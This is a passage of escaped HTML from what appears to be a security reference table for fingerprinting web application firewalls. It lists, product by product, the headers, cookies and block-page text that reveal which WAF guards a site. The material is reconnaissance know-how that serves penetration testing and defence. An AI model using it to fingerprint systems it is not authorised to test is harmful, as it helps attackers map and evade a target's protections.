\u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eBlocked response page displays \u003ccode\u003eks-waf-error.png\u003c/code\u003e image (view source to see).\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n KONA Site Defender (Akamai)\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eServer\u003c/code\u003e header contains \u003ccode\u003eAkamaiGHost\u003c/code\u003e keyword.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n LiteSpeed\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eServer\u003c/code\u003e header has value set to \u003ccode\u003eLiteSpeed\u003c/code\u003e.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eResponse page contains:\u003c/code\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eProudly powered by LiteSpeed Web Server\u003c/code\u003e text.\u003c/li\u003e\n \u003cli\u003eReference to \u003ccode\u003ehttp://www.litespeedtech.com/error-page\u003c/code\u003e\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eAccess to resource on this server is denied.\u003c/code\u003e\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n Malcare\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eModerate\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eBlocked response page may contains:\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eBlocked because of Malicious Activities\u003c/code\u003e text snippet.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eFirewall powered by MalCare\u003c/code\u003e text snippet.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n MissionControl Application Shield\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eServer\u003c/code\u003e header field contains \u003ccode\u003eMission Control Application Shield\u003c/code\u003e value.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n ModSecurity\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eModerate/Difficult\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eBlocked response page contains:\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eThis error was generated by Mod_Security\u003c/code\u003e text snippet.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eOne or more things in your request were suspicious\u003c/code\u003e text snippet.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003erules of the mod_security module\u003c/code\u003e text snippet.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003emod_security rules triggered\u003c/code\u003e text snippet.\u003c/li\u003e\n \u003cli\u003eReference to \u003ccode\u003e/modsecurity-errorpage/\u003c/code\u003e directory.\u003c/li\u003e\n \u003c/ul\u003e\n \u003cli\u003e\u003ccode\u003eServer\u003c/code\u003e header may contain \u003ccode\u003eMod_Security\u003c/code\u003e or \u003ccode\u003eNYOB\u003c/code\u003e keywords.\u003c/li\u003e\n \u003cli\u003eSometimes, the response code to an attack is \u003ccode\u003e403\u003c/code\u003e while the response phrase is \u003ccode\u003eModSecurity Action\u003c/code\u003e.\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n ModSecurity CRS\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eDifficult\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eBlockpage occurs on adding a separate request header \u003ccode\u003eX-Scanner\u003c/code\u003e when set to a particular paranoa level.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n NAXSI\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eBlocked response page contains \u003ccode\u003eThis Request Has Been Blocked By NAXSI\u003c/code\u003e.\u003c/li\u003e\n \u003cli\u003eResponse headers contain unusual field \u003ccode\u003eX-Data-Origin\u003c/code\u003e with value \u003ccode\u003enaxsi/waf\u003c/code\u003e keyword.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eServer\u003c/code\u003e header contains \u003ccode\u003enaxsi/waf\u003c/code\u003e keyword value.\u003c/li\u003e\n \u003cli\u003eBlocked response page may contain \u003ccode\u003eNAXSI blocked information\u003c/code\u003e error code.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n Nemesida\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eDifficult\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eBlocked response page contains \u003ccode\u003eSuspicious activity detected. Access to the site is blocked.\u003c/code\u003e.\u003c/li\u003e\n \u003cli\u003eContains reference to email \u003ccode\u003enwaf@{site.tld}\u003c/code\u003e\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n Netcontinuum\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eModerate\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eSession cookies contain \u003ccode\u003eNCI__SessionId=\u003c/code\u003e cookie field name.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n NetScaler AppFirewall\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eModerate\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eResponse headers may contain\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eConnection:\u003c/code\u003e header field name jumbled to \u003ccode\u003ennCoection:\u003c/code\u003e\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003ens_af=\u003c/code\u003e cookie field name.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003ecitrix_ns_id\u003c/code\u003e field name.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eNSC_\u003c/code\u003e keyword.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eNS-CACHE\u003c/code\u003e field value.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n NevisProxy\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eModerate\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eResponse header cookies contain \u003ccode\u003eNavajo\u003c/code\u003e keyword.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n NewDefend\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eResponse page contains:\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eReference to \u003ccode\u003ehttp://www.newdefend.com/feedback/misinformation/\u003c/code\u003e URL.\u003c/li\u003e\n \u003cli\u003eReference to \u003ccode\u003e/nd_block/\u003c/code\u003e directory.\u003c/li\u003e\n \u003c/ul\u003e\n \u003cli\u003e\u003ccode\u003eServer\u003c/code\u003e header contains \u003ccode\u003eNewDefend\u003c/code\u003e keyword.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n Nexusguard\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eBlocked response page has reference to \u003ccode\u003esperesources.nexusguard.com/wafpage/index.html\u003c/code\u003e URL.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n NinjaFirewall\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eModerate\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eResponse page title contains \u003ccode\u003eNinjaFirewall: 403 Forbidden\u003c/code\u003e.\u003c/li\u003e\n \u003cli\u003eResponse page contains:\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eFor security reasons, it was blocked and logged\u003c/code\u003e text snippet.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eNinjaFirewall\u003c/code\u003e keyword in title.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/li\u003e\n \u003cli\u003eReturns a \u003ccode\u003e403 Forbidden\u003c/code\u003e response upon malicious requests.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n NSFocus\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eServer\u003c/code\u003e header contain \u003ccode\u003eNSFocus\u003c/code\u003e keyword.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n NullDDoS\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eServer\u003c/code\u003e header contains the \u003ccode\u003eNullDDoS System\u003c/code\u003e keyword.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n onMessage Shield\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eResponse headers contain header \u003ccode\u003eX-Engine\u003c/code\u003e field with value \u003ccode\u003eonMessage Shield\u003c/code\u003e.\u003c/li\u003e\n \u003cli\u003eBlocked response page contains:\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eBlackbaud K-12 conducts routine maintenance\u003c/code\u003e keyword.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eThis site is protected by an enhanced security system\u003c/code\u003e.\u003c/li\u003e\n \u003cli\u003eReference to \u003ccode\u003ehttps://status.blackbaud.com\u003c/code\u003e URL.\u003c/li\u003e\n \u003cli\u003eReference to \u003ccode\u003ehttps://maintenance.blackbaud.com\u003c/code\u003e URL.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n OpenResty Lua WAF\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eServer\u003c/code\u003e header contains \u003ccode\u003eopenresty/{version}\u003c/code\u003e keyword.\u003c/li\u003e\n \u003cli\u003eBlocked response page contains \u003ccode\u003eopenresty/{version}\u003c/code\u003e text.\u003c/li\u003e\n \u003cli\u003eBlocked response code returned is \u003ccode\u003e406 Not Acceptable\u003c/code\u003e.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n Palo Alto\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eModerate\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eBlocked response page contains \u003ccode\u003eVirus/Spyware Download Blocked\u003c/code\u003e.\u003c/li\u003e\n \u003cli\u003eResponse page might contain \u003ccode\u003ePalo Alto Next Generation Security Platform\u003c/code\u003e text snippet.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n PentaWAF\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eServer\u003c/code\u003e header contains \u003ccode\u003ePentaWAF/{version}\u003c/code\u003e keyword.\u003c/li\u003e\n \u003cli\u003eBlocked response page contains text \u003ccode\u003ePentaWAF/{version}\u003c/code\u003e.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n PerimeterX\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eBlocked response page contains reference to\u003cbr\u003e \u003ccode\u003ehttps://www.perimeterx.com/whywasiblocked\u003c/code\u003e URL.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n pkSecurityModule IDS\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eModerate\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eResponse content may contain\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003epkSecurityModule: Security.Alert\u003c/code\u003e.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eA safety critical request was discovered and blocked\u003c/code\u003e text snippet.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n Positive Technologies Application Firewall\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eDifficult\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eBlocked response page contains \u003ccode\u003eForbidden\u003c/code\u003e in \u003ccode\u003eh1\u003c/code\u003e followed by:\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eRequest ID:\u003c/code\u003e in format \u003ccode\u003eyyyy-mm-dd-hh-mm-ss-{ref. code}\u003c/code\u003e\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n PowerCDN\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eModerate\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eResponse headers may contain\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eVia\u003c/code\u003e header with content \u003ccode\u003epowercdn.com\u003c/code\u003e.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eX-Cache\u003c/code\u003e header with content \u003ccode\u003epowercdn.com\u003c/code\u003e.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eX-CDN\u003c/code\u003e header with content \u003ccode\u003ePowerCDN\u003c/code\u003e.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n Profense\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eSet-Cookie\u003c/code\u003e headers contain \u003ccode\u003ePLBSID=\u003c/code\u003e cookie field name.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eServer\u003c/code\u003e header contain \u003ccode\u003eProfense\u003c/code\u003e keyword.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n Proventia (IBM)\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eDifficult\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eBlocked response page might contain to \u003ccode\u003erequest does not match Proventia rules\u003c/code\u003e text snippet.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n Puhui\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eServer\u003c/code\u003e header contain \u003ccode\u003ePuhuiWAF\u003c/code\u003e keyword.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n Qiniu CDN\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eResponse content may contain\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eResponse headers contain unusual header \u003ccode\u003eX-Qiniu-CDN\u003c/code\u003e with value set to either \u003ccode\u003e0\u003c/code\u003e or \u003ccode\u003e1\u003c/code\u003e.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n Radware Appwall\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eModerate\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eResponse page contains the following text snippet:\u003cbr\u003e \u003ccode\u003eUnauthorized Activity Has Been Detected.\u003c/code\u003e and \u003ccode\u003eCase Number\u003c/code\u003e\u003c/li\u003e\n \u003cli\u003eBlocked response page has reference to \u003ccode\u003eradwarealerting@{site.tld}\u003c/code\u003e email.\u003c/li\u003e\n \u003cli\u003eBlocked response page has title set to \u003ccode\u003eUnauthorized Request Blocked\u003c/code\u003e.\u003c/li\u003e\n \u003cli\u003eResponse headers may contain \u003ccode\u003eX-SL-CompState\u003c/code\u003e header field name.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n Reblaze\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eModerate\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eCookies in response headers contain \u003ccode\u003erbzid=\u003c/code\u003e header field name.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eServer\u003c/code\u003e field value might contain \u003ccode\u003eReblaze Secure Web Gateway\u003c/code\u003e text snippet.\u003c/li\u003e\n \u003cli\u003eResponse page contains:\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eAccess Denied (403)\u003c/code\u003e in bold.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eCurrent session has been terminated\u003c/code\u003e text.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eFor further information, do not hesitate to contact us\u003c/code\u003e.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n Request Validation Mode\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eA firewall found specifically on ASP.NET websites and none others.\u003c/li\u003e\n \u003cli\u003eResponse page contains either of the following text snippet:\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eASP.NET has detected data in the request that is potentially dangerous.\u003c/code\u003e\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eRequest Validation has detected a potentially dangerous client input value.\u003c/code\u003e\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eHttpRequestValidationException.\u003c/code\u003e\u003c/li\u003e\n \u003c/ul\u003e\n \u003cli\u003eBlocked response code returned is always \u003ccode\u003e500 Internal Error\u003c/code\u003e.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n RSFirewall\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eResponse page contains:\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eCOM_RSFIREWALL_403_FORBIDDEN\u003c/code\u003e keyword.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eCOM_RSFIREWALL_EVENT\u003c/code\u003e keyword.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n Sabre\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eReturns status code \u003ccode\u003e500 Internal Error\u003c/code\u003e upon malicious requests.\u003c/li\u003e\n \u003cli\u003eResponse content has:\n \u003cul\u003e\n \u003cli\u003eContact email \u003ccode\u003edxsupport@sabre.com\u003c/code\u003e.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eYour request has been blocked\u003c/code\u003e bold warning.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eclicking the above email link will automatically add some important details to the email for us to investigate the problem\u003c/code\u003e text snippet.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n Safe3\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eResponse headers contain:\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eX-Powered-By\u003c/code\u003e header has field value \u003ccode\u003eSafe3WAF\u003c/code\u003e.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eServer\u003c/code\u003e header contains field value set to \u003ccode\u003eSafe3 Web Firewall\u003c/code\u003e.\u003c/li\u003e\n \u003c/ul\u003e\n \u003cli\u003eResponse page contains \u003ccode\u003eSafe3waf\u003c/code\u003e keyword.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n SafeDog\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy/Moderate\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eServer\u003c/code\u003e header in response may contain:\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eWAF/2.0\u003c/code\u003e keyword.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003esafedog\u003c/code\u003e field value.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n 